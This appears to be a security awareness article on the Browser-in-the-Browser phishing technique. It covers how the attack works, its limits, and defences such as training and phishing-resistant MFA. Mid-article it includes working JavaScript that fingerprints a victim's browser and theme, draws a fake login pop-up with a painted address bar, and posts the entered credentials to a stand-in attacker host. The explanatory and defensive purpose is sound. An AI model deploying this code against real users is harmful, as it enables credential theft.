A new phishing variant has been observed recently: the Browser in the Browser (BitB). It is an attack aimed at defeating the user's usual detection habits by drawing a fake browser pop-up window inside a real browser window.
Understanding the BitB Technique
Indeed, most of the time a victim recognises a phishing login page by checking the legitimacy of the URL shown in the browser's address bar. The Browser in the Browser turns this check against the user: the fake window carries its own painted address bar, which displays a legitimate-looking address so that the user trusts it, while the real address bar at the top of the tab still shows the attacker's page.
Exploring BitB Tactics
The attacker therefore builds this fake window much as a web designer would, with JavaScript, CSS and HTML, so that it matches the genuine pop-up (title bar, address bar, login form) as closely as possible. Seeing a legitimate URL on the login page, the user falls into the attacker's trap and enters their credentials into a form the attacker controls.
Challenges and Adaptations
The technique still has limits. Because the fake window is only an element of the attacker's page, it cannot be separated from the real browser window: dragging it past the edge of the tab clips it instead of moving it onto the desktop. It likewise cannot be displayed in full screen or resized by the user the way a genuine pop-up can, which gives an attentive user a practical way to tell the two apart.
The attacker can, however, detect the victim's browser (from the User-Agent string) and whether it runs in light or dark mode (from the prefers-color-scheme media query), and use that information to style the fake window so that it matches the victim's real windows.
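As an added example, not code from the original article or the video it describes, the following JavaScript shows the two points above in working form: how a page reads the victim's browser and colour scheme, and how the fake window, address bar included, is nothing more than styled HTML into which any URL can be written. Function names, palette values and the sample URLs are assumptions made for the example; it runs under Node (printing the HTML) as well as in a browser (inserting it into the page).

```javascript
// Added example, not code from the original article or video: a minimal
// Browser in the Browser mock-up written as pure functions so that it runs
// under Node as well as in a browser. Every part of the fake "window",
// including its address bar, is ordinary HTML and CSS drawn by the attacker's
// page, so the URL it shows is just text. Function names, palette values and
// the sample URLs below are illustrative assumptions.

// Pick the browser chrome to imitate from the User-Agent string.
// Order matters: Edge and Opera UAs also contain "Chrome/", and Chrome UAs
// also contain "Safari/".
function detectBrowser(userAgent) {
  const ua = String(userAgent || "");
  if (/Edg\//.test(ua)) return "edge";
  if (/OPR\//.test(ua)) return "opera";
  if (/Firefox\//.test(ua)) return "firefox";
  if (/Chrome\//.test(ua)) return "chrome";
  if (/Safari\//.test(ua)) return "safari";
  return "chrome"; // unknown UA: fall back to the most common chrome
}

// Read the colour scheme the victim's browser reports. In a browser, pass
// window.matchMedia; it is a parameter here so the logic is testable without
// a DOM, and an absent matchMedia degrades to "light".
function detectTheme(matchMedia) {
  if (typeof matchMedia !== "function") return "light";
  const result = matchMedia("(prefers-color-scheme: dark)");
  return result && result.matches ? "dark" : "light";
}

// Colours for the fake title bar / address bar per browser and theme.
// Rough approximations chosen for the example, not exact copies of any browser.
const CHROME_STYLES = {
  chrome:  { light: { bar: "#dee1e6", text: "#202124" }, dark: { bar: "#35363a", text: "#e8eaed" } },
  edge:    { light: { bar: "#e7e7e7", text: "#1b1b1b" }, dark: { bar: "#2b2b2b", text: "#f0f0f0" } },
  opera:   { light: { bar: "#f0f0f0", text: "#1b1b1b" }, dark: { bar: "#2c2c2c", text: "#f0f0f0" } },
  firefox: { light: { bar: "#f9f9fb", text: "#15141a" }, dark: { bar: "#1c1b22", text: "#fbfbfe" } },
  safari:  { light: { bar: "#ececec", text: "#1d1d1f" }, dark: { bar: "#2d2d2d", text: "#f5f5f7" } },
};

// Escape strings before interpolating them into HTML.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Build the fake pop-up as an HTML string. `displayedUrl` is what the victim
// sees in the painted address bar; `formAction` is where the typed
// credentials really go. The two are independent, which is the whole trick.
function renderFakeWindow({ browser, theme, title, displayedUrl, formAction }) {
  const palette = CHROME_STYLES[browser] || CHROME_STYLES.chrome;
  const style = palette[theme === "dark" ? "dark" : "light"];
  const bar = `background:${style.bar};color:${style.text};`;
  return [
    // position:fixed keeps it inside the tab's viewport: it can never leave the
    // real browser window, which is the limitation the article describes.
    `<div class="bitb ${browser} ${theme}" style="position:fixed;top:120px;left:200px;width:480px;` +
      `border:1px solid #888;border-radius:8px;overflow:hidden;font-family:sans-serif;">`,
    `  <div class="bitb-title" style="${bar}padding:6px 10px;">${escapeHtml(title)}` +
      `<span style="float:right;">&#x2715;</span></div>`,
    // The "address bar" is a div, not a real URL bar: it will show any text.
    `  <div class="bitb-address" style="${bar}padding:6px 10px;">` +
      `&#x1F512; ${escapeHtml(displayedUrl)}</div>`,
    `  <form method="post" action="${escapeHtml(formAction)}" style="padding:16px;">`,
    `    <input name="username" placeholder="Email"><br>`,
    `    <input name="password" type="password" placeholder="Password"><br>`,
    `    <button type="submit">Sign in</button>`,
    `  </form>`,
    `</div>`,
  ].join("\n");
}

// Usage: in a browser the attacker's page would insert the result into the
// DOM; under Node we just print it. The URLs are constructed sample values.
const fakeWindowHtml = renderFakeWindow({
  browser: detectBrowser(typeof navigator !== "undefined" ? navigator.userAgent : ""),
  theme: detectTheme(typeof window !== "undefined" ? window.matchMedia : undefined),
  title: "Sign in",
  displayedUrl: "https://login.example.com/oauth", // what the victim sees
  formAction: "https://attacker.example/collect",  // where the form really posts
});
if (typeof document !== "undefined") {
  document.body.insertAdjacentHTML("beforeend", fakeWindowHtml);
} else {
  console.log(fakeWindowHtml);
}
```

The same properties point to the checks a user can make: the real address bar at the top of the tab still shows the page that created this element, and because the element is positioned inside the viewport it cannot be dragged onto the desktop or a second monitor as a genuine pop-up can.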
Defense Strategies Against BitB
Against this type of attack it is important to communicate, so that the Browser in the Browser does not remain unknown. Train employees to check the links they receive by email and to look carefully at login pop-ups: at the real address bar at the top of the tab rather than the one drawn inside the pop-up, and at whether the pop-up can be dragged outside the browser window.
The "classic" anti-phishing arsenal remains in place:
- Anti-phishing filter
- MFA (preferably phishing-resistant MFA such as FIDO2/WebAuthn, where the authenticator checks the real origin rather than the address painted on screen)
- Web proxy
- Phishing awareness solution
Key Takeaways from the Video:
In this video, you will learn:
- What is the Browser in the Browser attack?
- What does the Browser in the Browser technique look like in practice, through a demonstration?
- How to prevent the Browser in the Browser?
- What improvements can be expected regarding these attacks?